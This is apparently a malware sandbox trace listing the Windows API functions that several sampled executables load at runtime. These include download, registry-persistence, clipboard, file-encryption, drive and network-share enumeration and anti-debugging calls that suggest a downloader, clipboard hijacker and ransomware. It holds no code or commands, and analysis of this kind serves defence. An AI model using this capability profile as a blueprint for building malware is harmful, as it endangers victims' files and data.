DynamicLoader: msvcrt.dll/_acmdln
DynamicLoader: msvcrt.dll/exit
DynamicLoader: msvcrt.dll/_XcptFilter
DynamicLoader: msvcrt.dll/_exit
DynamicLoader: msvcrt.dll/_snprintf
DynamicLoader: msvcrt.dll/fclose
DynamicLoader: msvcrt.dll/fseek
DynamicLoader: msvcrt.dll/ftell
DynamicLoader: msvcrt.dll/srand
DynamicLoader: msvcrt.dll/rand
DynamicLoader: msvcrt.dll/_wfopen
DynamicLoader: msvcrt.dll/_snwprintf
DynamicLoader: WININET.dll/HttpQueryInfoA
DynamicLoader: WININET.dll/InternetCloseHandle
DynamicLoader: WININET.dll/InternetReadFile
DynamicLoader: WININET.dll/InternetOpenUrlW
DynamicLoader: WININET.dll/InternetOpenW
DynamicLoader: WININET.dll/InternetOpenUrlA
DynamicLoader: WININET.dll/InternetOpenA
DynamicLoader: urlmon.dll/URLDownloadToFileW
DynamicLoader: SHLWAPI.dll/PathFindFileNameW
DynamicLoader: SHLWAPI.dll/PathFindFileNameA
DynamicLoader: SHLWAPI.dll/PathFileExistsW
DynamicLoader: kernel32.dll/ExitThread
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/CreateMutexA
DynamicLoader: kernel32.dll/SetFileAttributesW
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/GetStartupInfoA
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/CreateProcessW
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/CopyFileW
DynamicLoader: ADVAPI32.dll/RegSetValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegCreateKeyExA
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: SHELL32.dll/ShellExecuteW
DynamicLoader: winsvcs.exe/atexit
DynamicLoader: RASAPI32.dll/RasConnectionNotificationW
DynamicLoader: sechost.dll/NotifyServiceStatusChangeA
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: iphlpapi.DLL/GetAdaptersAddresses
DynamicLoader: DHCPCSVC.DLL/DhcpRequestParams
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/GetVersionExA
DynamicLoader: kernel32.dll/TerminateProcess
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: msvcrt.dll/_controlfp
DynamicLoader: msvcrt.dll/_except_handler3
DynamicLoader: msvcrt.dll/__set_app_type
DynamicLoader: msvcrt.dll/isalpha
DynamicLoader: msvcrt.dll/__p__fmode
DynamicLoader: msvcrt.dll/__p__commode
DynamicLoader: msvcrt.dll/_adjust_fdiv
DynamicLoader: msvcrt.dll/__setusermatherr
DynamicLoader: msvcrt.dll/_initterm
DynamicLoader: msvcrt.dll/__getmainargs
DynamicLoader: msvcrt.dll/_acmdln
DynamicLoader: msvcrt.dll/exit
DynamicLoader: msvcrt.dll/_XcptFilter
DynamicLoader: msvcrt.dll/_exit
DynamicLoader: msvcrt.dll/_snprintf
DynamicLoader: msvcrt.dll/wcsstr
DynamicLoader: msvcrt.dll/srand
DynamicLoader: msvcrt.dll/rand
DynamicLoader: msvcrt.dll/_snwprintf
DynamicLoader: msvcrt.dll/isdigit
DynamicLoader: msvcrt.dll/memset
DynamicLoader: msvcrt.dll/memcpy
DynamicLoader: WININET.dll/InternetOpenUrlA
DynamicLoader: WININET.dll/HttpQueryInfoA
DynamicLoader: WININET.dll/InternetCloseHandle
DynamicLoader: WININET.dll/InternetReadFile
DynamicLoader: WININET.dll/InternetOpenUrlW
DynamicLoader: WININET.dll/InternetOpenW
DynamicLoader: WININET.dll/InternetOpenA
DynamicLoader: urlmon.dll/URLDownloadToFileW
DynamicLoader: SHLWAPI.dll/PathFileExistsW
DynamicLoader: SHLWAPI.dll/PathFindFileNameA
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/GetFileAttributesW
DynamicLoader: kernel32.dll/CopyFileW
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/GetLogicalDriveStringsW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/GlobalUnlock
DynamicLoader: kernel32.dll/ExitThread
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/GlobalAlloc
DynamicLoader: kernel32.dll/GlobalLock
DynamicLoader: kernel32.dll/FindNextFileW
DynamicLoader: kernel32.dll/SetFileAttributesW
DynamicLoader: kernel32.dll/GetVolumeInformationW
DynamicLoader: kernel32.dll/CreateProcessW
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetStartupInfoA
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/CreateMutexA
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: USER32.dll/OpenClipboard
DynamicLoader: USER32.dll/EmptyClipboard
DynamicLoader: USER32.dll/GetClipboardData
DynamicLoader: USER32.dll/CloseClipboard
DynamicLoader: USER32.dll/SetClipboardData
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegSetValueExW
DynamicLoader: ADVAPI32.dll/RegCreateKeyExA
DynamicLoader: SHELL32.dll/ShellExecuteW
DynamicLoader: ole32.dll/CoInitialize
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: 2841536727.exe/atexit
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/GetVersionExA
DynamicLoader: kernel32.dll/TerminateProcess
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: msvcrt.dll/_controlfp
DynamicLoader: msvcrt.dll/_except_handler3
DynamicLoader: msvcrt.dll/__set_app_type
DynamicLoader: msvcrt.dll/isalpha
DynamicLoader: msvcrt.dll/__p__fmode
DynamicLoader: msvcrt.dll/__p__commode
DynamicLoader: msvcrt.dll/_adjust_fdiv
DynamicLoader: msvcrt.dll/__setusermatherr
DynamicLoader: msvcrt.dll/_initterm
DynamicLoader: msvcrt.dll/__getmainargs
DynamicLoader: msvcrt.dll/_acmdln
DynamicLoader: msvcrt.dll/exit
DynamicLoader: msvcrt.dll/_XcptFilter
DynamicLoader: msvcrt.dll/_exit
DynamicLoader: msvcrt.dll/_snprintf
DynamicLoader: msvcrt.dll/wcsstr
DynamicLoader: msvcrt.dll/srand
DynamicLoader: msvcrt.dll/rand
DynamicLoader: msvcrt.dll/_snwprintf
DynamicLoader: msvcrt.dll/isdigit
DynamicLoader: msvcrt.dll/memset
DynamicLoader: msvcrt.dll/memcpy
DynamicLoader: WININET.dll/InternetOpenUrlA
DynamicLoader: WININET.dll/HttpQueryInfoA
DynamicLoader: WININET.dll/InternetCloseHandle
DynamicLoader: WININET.dll/InternetReadFile
DynamicLoader: WININET.dll/InternetOpenUrlW
DynamicLoader: WININET.dll/InternetOpenW
DynamicLoader: WININET.dll/InternetOpenA
DynamicLoader: urlmon.dll/URLDownloadToFileW
DynamicLoader: SHLWAPI.dll/PathFileExistsW
DynamicLoader: SHLWAPI.dll/PathFindFileNameA
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/GetFileAttributesW
DynamicLoader: kernel32.dll/CopyFileW
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/GetLogicalDriveStringsW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/GlobalUnlock
DynamicLoader: kernel32.dll/ExitThread
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/GlobalAlloc
DynamicLoader: kernel32.dll/GlobalLock
DynamicLoader: kernel32.dll/FindNextFileW
DynamicLoader: kernel32.dll/SetFileAttributesW
DynamicLoader: kernel32.dll/GetVolumeInformationW
DynamicLoader: kernel32.dll/CreateProcessW
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetStartupInfoA
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/CreateMutexA
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: USER32.dll/OpenClipboard
DynamicLoader: USER32.dll/EmptyClipboard
DynamicLoader: USER32.dll/GetClipboardData
DynamicLoader: USER32.dll/CloseClipboard
DynamicLoader: USER32.dll/SetClipboardData
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegSetValueExW
DynamicLoader: ADVAPI32.dll/RegCreateKeyExA
DynamicLoader: SHELL32.dll/ShellExecuteW
DynamicLoader: ole32.dll/CoInitialize
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: winsvcs.exe/atexit
DynamicLoader: RASAPI32.dll/RasConnectionNotificationW
DynamicLoader: sechost.dll/NotifyServiceStatusChangeA
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/GlobalAlloc
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/GetVersionExA
DynamicLoader: kernel32.dll/TerminateProcess
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: kernel32.dll/OpenMutexW
DynamicLoader: kernel32.dll/GetSystemInfo
DynamicLoader: kernel32.dll/WaitForMultipleObjects
DynamicLoader: kernel32.dll/lstrcmpiW
DynamicLoader: kernel32.dll/GetUserDefaultUILanguage
DynamicLoader: kernel32.dll/DeleteCriticalSection
DynamicLoader: kernel32.dll/GetShortPathNameW
DynamicLoader: kernel32.dll/GetWindowsDirectoryW
DynamicLoader: kernel32.dll/GetVolumeInformationW
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/lstrcpyA
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/lstrcmpiA
DynamicLoader: kernel32.dll/Process32FirstW
DynamicLoader: kernel32.dll/Process32NextW
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/LeaveCriticalSection
DynamicLoader: kernel32.dll/EnterCriticalSection
DynamicLoader: kernel32.dll/VirtualLock
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/MoveFileExW
DynamicLoader: kernel32.dll/FindFirstFileExW
DynamicLoader: kernel32.dll/WideCharToMultiByte
DynamicLoader: kernel32.dll/lstrcmpW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/FindNextFileW
DynamicLoader: kernel32.dll/GetSystemTime
DynamicLoader: kernel32.dll/GetNativeSystemInfo
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/GetDiskFreeSpaceW
DynamicLoader: kernel32.dll/VirtualUnlock
DynamicLoader: kernel32.dll/VerSetConditionMask
DynamicLoader: kernel32.dll/VerifyVersionInfoW
DynamicLoader: kernel32.dll/SetLastError
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/LocalFree
DynamicLoader: kernel32.dll/GlobalAlloc
DynamicLoader: kernel32.dll/MulDiv
DynamicLoader: kernel32.dll/GetTempPathW
DynamicLoader: kernel32.dll/GlobalFree
DynamicLoader: kernel32.dll/ConnectNamedPipe
DynamicLoader: kernel32.dll/CreateNamedPipeW
DynamicLoader: kernel32.dll/CreateEventW
DynamicLoader: kernel32.dll/GetCurrentProcessId
DynamicLoader: kernel32.dll/GetFullPathNameW
DynamicLoader: kernel32.dll/SetStdHandle
DynamicLoader: kernel32.dll/GetConsoleMode
DynamicLoader: kernel32.dll/GetConsoleCP
DynamicLoader: kernel32.dll/FlushFileBuffers
DynamicLoader: kernel32.dll/OutputDebugStringW
DynamicLoader: kernel32.dll/HeapAlloc
DynamicLoader: kernel32.dll/RtlUnwind
DynamicLoader: kernel32.dll/ExitThread
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/TerminateProcess
DynamicLoader: kernel32.dll/OpenProcess
DynamicLoader: kernel32.dll/InitializeCriticalSection
DynamicLoader: kernel32.dll/GetDriveTypeA
DynamicLoader: kernel32.dll/GetCommandLineA
DynamicLoader: kernel32.dll/GetProcessHeap
DynamicLoader: kernel32.dll/GetComputerNameW
DynamicLoader: kernel32.dll/WaitForSingleObject
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: kernel32.dll/GetSystemDefaultUILanguage
DynamicLoader: kernel32.dll/CreateMutexW
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/lstrcpyW
DynamicLoader: kernel32.dll/lstrcatW
DynamicLoader: kernel32.dll/GetProcAddress
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/LoadLibraryW
DynamicLoader: kernel32.dll/GetSystemDirectoryW
DynamicLoader: kernel32.dll/GetModuleHandleW
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: kernel32.dll/LoadLibraryExW
DynamicLoader: kernel32.dll/VirtualQuery
DynamicLoader: kernel32.dll/MultiByteToWideChar
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/lstrlenA
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/UnlockFile
DynamicLoader: kernel32.dll/SetFilePointerEx
DynamicLoader: kernel32.dll/GetStdHandle
DynamicLoader: kernel32.dll/LCMapStringW
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: kernel32.dll/TlsSetValue
DynamicLoader: kernel32.dll/TlsGetValue
DynamicLoader: kernel32.dll/InitializeCriticalSectionAndSpinCount
DynamicLoader: kernel32.dll/SetUnhandledExceptionFilter
DynamicLoader: kernel32.dll/UnhandledExceptionFilter
DynamicLoader: kernel32.dll/GetStringTypeW
DynamicLoader: kernel32.dll/HeapFree
DynamicLoader: kernel32.dll/GetModuleHandleExW
DynamicLoader: kernel32.dll/IsProcessorFeaturePresent
DynamicLoader: kernel32.dll/IsValidCodePage
DynamicLoader: kernel32.dll/GetACP
DynamicLoader: kernel32.dll/GetOEMCP
DynamicLoader: kernel32.dll/GetCPInfo
DynamicLoader: kernel32.dll/GetCurrentThreadId
DynamicLoader: kernel32.dll/WriteConsoleW
DynamicLoader: USER32.dll/SystemParametersInfoW
DynamicLoader: USER32.dll/ReleaseDC
DynamicLoader: USER32.dll/GetDC
DynamicLoader: USER32.dll/wsprintfA
DynamicLoader: USER32.dll/wsprintfW
DynamicLoader: USER32.dll/CreateWindowStationW
DynamicLoader: USER32.dll/SetProcessWindowStation
DynamicLoader: USER32.dll/DrawTextA
DynamicLoader: USER32.dll/DrawTextW
DynamicLoader: USER32.dll/FillRect
DynamicLoader: USER32.dll/GetForegroundWindow
DynamicLoader: GDI32.dll/SetTextColor
DynamicLoader: GDI32.dll/DeleteDC
DynamicLoader: GDI32.dll/GetDeviceCaps
DynamicLoader: GDI32.dll/GetDIBits
DynamicLoader: GDI32.dll/SetBkColor
DynamicLoader: GDI32.dll/SetPixel
DynamicLoader: GDI32.dll/DeleteObject
DynamicLoader: GDI32.dll/SelectObject
DynamicLoader: GDI32.dll/CreateCompatibleDC
DynamicLoader: GDI32.dll/CreateCompatibleBitmap
DynamicLoader: GDI32.dll/CreateFontW
DynamicLoader: GDI32.dll/GetObjectW
DynamicLoader: GDI32.dll/GetPixel
DynamicLoader: GDI32.dll/GetStockObject
DynamicLoader: GDI32.dll/SetBitmapBits
DynamicLoader: GDI32.dll/CreateBitmap
DynamicLoader: GDI32.dll/GetBitmapBits
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/GetSidSubAuthorityCount
DynamicLoader: ADVAPI32.dll/GetSidSubAuthority
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/GetUserNameW
DynamicLoader: ADVAPI32.dll/CryptDestroyKey
DynamicLoader: ADVAPI32.dll/CryptGenKey
DynamicLoader: ADVAPI32.dll/CryptEncrypt
DynamicLoader: ADVAPI32.dll/CryptImportKey
DynamicLoader: ADVAPI32.dll/CryptReleaseContext
DynamicLoader: ADVAPI32.dll/CryptGetKeyParam
DynamicLoader: ADVAPI32.dll/CryptAcquireContextW
DynamicLoader: ADVAPI32.dll/CryptExportKey
DynamicLoader: ADVAPI32.dll/RegSetValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCreateKeyExW
DynamicLoader: SHELL32.dll/ShellExecuteW
DynamicLoader: SHELL32.dll/ShellExecuteExW
DynamicLoader: SHELL32.dll/SHGetSpecialFolderPathW
DynamicLoader: ole32.dll/CoInitialize
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: MPR.dll/WNetEnumResourceW
DynamicLoader: MPR.dll/WNetCloseEnum
DynamicLoader: MPR.dll/WNetOpenEnumW
DynamicLoader: WININET.dll/InternetOpenW
DynamicLoader: WININET.dll/HttpOpenRequestW
DynamicLoader: WININET.dll/HttpSendRequestW
DynamicLoader: WININET.dll/HttpQueryInfoA
DynamicLoader: WININET.dll/InternetCloseHandle
DynamicLoader: WININET.dll/InternetConnectW
DynamicLoader: RPCRT4.dll/NdrClientCall2
DynamicLoader: 3751939260.exe/atexit
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: ntdll.dll/RtlComputeCrc32
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: CRYPTSP.dll/CryptGenRandom
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: CRYPTSP.dll/CryptGenKey
DynamicLoader: CRYPTSP.dll/CryptExportKey
DynamicLoader: CRYPTSP.dll/CryptDestroyKey
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: CRYPTSP.dll/CryptImportKey
DynamicLoader: CRYPTSP.dll/CryptGetKeyParam
DynamicLoader: CRYPTSP.dll/CryptEncrypt
DynamicLoader: ntdll.dll/RtlComputeCrc32
DynamicLoader: USER32.dll/LoadStringW
DynamicLoader: drprov.dll/NPGetCaps
DynamicLoader: drprov.dll/NPGetUser
DynamicLoader: drprov.dll/NPAddConnection
DynamicLoader: drprov.dll/NPAddConnection3
DynamicLoader: drprov.dll/NPGetReconnectFlags
DynamicLoader: drprov.dll/NPCancelConnection
DynamicLoader: drprov.dll/NPGetConnection
DynamicLoader: drprov.dll/NPGetConnection3
DynamicLoader: drprov.dll/NPGetUniversalName
DynamicLoader: drprov.dll/NPOpenEnum
DynamicLoader: drprov.dll/NPEnumResource
DynamicLoader: drprov.dll/NPCloseEnum
DynamicLoader: drprov.dll/NPGetResourceParent
DynamicLoader: drprov.dll/NPGetResourceInformation
DynamicLoader: ntlanman.dll/NPGetCaps
DynamicLoader: ntlanman.dll/NPGetUser
DynamicLoader: ntlanman.dll/NPAddConnection
DynamicLoader: ntlanman.dll/NPAddConnection3
DynamicLoader: ntlanman.dll/NPGetReconnectFlags
DynamicLoader: ntlanman.dll/NPCancelConnection
DynamicLoader: ntlanman.dll/NPGetConnection
DynamicLoader: ntlanman.dll/NPGetConnection3
DynamicLoader: ntlanman.dll/NPGetUniversalName
DynamicLoader: ntlanman.dll/NPGetConnectionPerformance
DynamicLoader: ntlanman.dll/NPOpenEnum
DynamicLoader: ntlanman.dll/NPEnumResource
DynamicLoader: ntlanman.dll/NPCloseEnum
DynamicLoader: ntlanman.dll/NPFormatNetworkName
DynamicLoader: ntlanman.dll/NPGetResourceParent
DynamicLoader: ntlanman.dll/NPGetResourceInformation
DynamicLoader: davclnt.dll/NPGetCaps
DynamicLoader: davclnt.dll/NPGetUser
DynamicLoader: davclnt.dll/NPAddConnection
DynamicLoader: davclnt.dll/NPAddConnection3
DynamicLoader: davclnt.dll/NPGetReconnectFlags
DynamicLoader: davclnt.dll/NPCancelConnection
DynamicLoader: davclnt.dll/NPGetConnection
DynamicLoader: davclnt.dll/NPGetConnection3
DynamicLoader: davclnt.dll/NPGetUniversalName
DynamicLoader: davclnt.dll/NPOpenEnum
DynamicLoader: davclnt.dll/NPEnumResource
DynamicLoader: davclnt.dll/NPCloseEnum
DynamicLoader: davclnt.dll/NPFormatNetworkName
DynamicLoader: davclnt.dll/NPGetResourceParent
DynamicLoader: davclnt.dll/NPGetResourceInformation
DynamicLoader: ADVAPI32.dll/LookupAccountSidW
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: ADVAPI32.dll/CreateWellKnownSid
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/RpcStringFreeW
DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: RPCRT4.dll/NdrClientCall2
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: wkscli.dll/NetWkstaGetInfo
DynamicLoader: cscapi.dll/CscNetApiGetInterface
DynamicLoader: netutils.dll/NetApiBufferFree
DynamicLoader: browcli.dll/NetServerEnum
DynamicLoader: sechost.dll/OpenSCManagerW
DynamicLoader: sechost.dll/OpenServiceW
DynamicLoader: sechost.dll/QueryServiceStatus
DynamicLoader: sechost.dll/CloseServiceHandle
DynamicLoader: cscapi.dll/CscNetApiGetInterface
DynamicLoader: netutils.dll/NetApiBufferAllocate
DynamicLoader: ntdll.dll/NtSetInformationFile
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: netutils.dll/NetApiBufferFree
DynamicLoader: MPR.dll/WNetSetLastErrorW
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/RpcStringFreeW
DynamicLoader: RPCRT4.dll/NdrClientCall2
DynamicLoader: RPCRT4.dll/I_RpcExceptionFilter
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
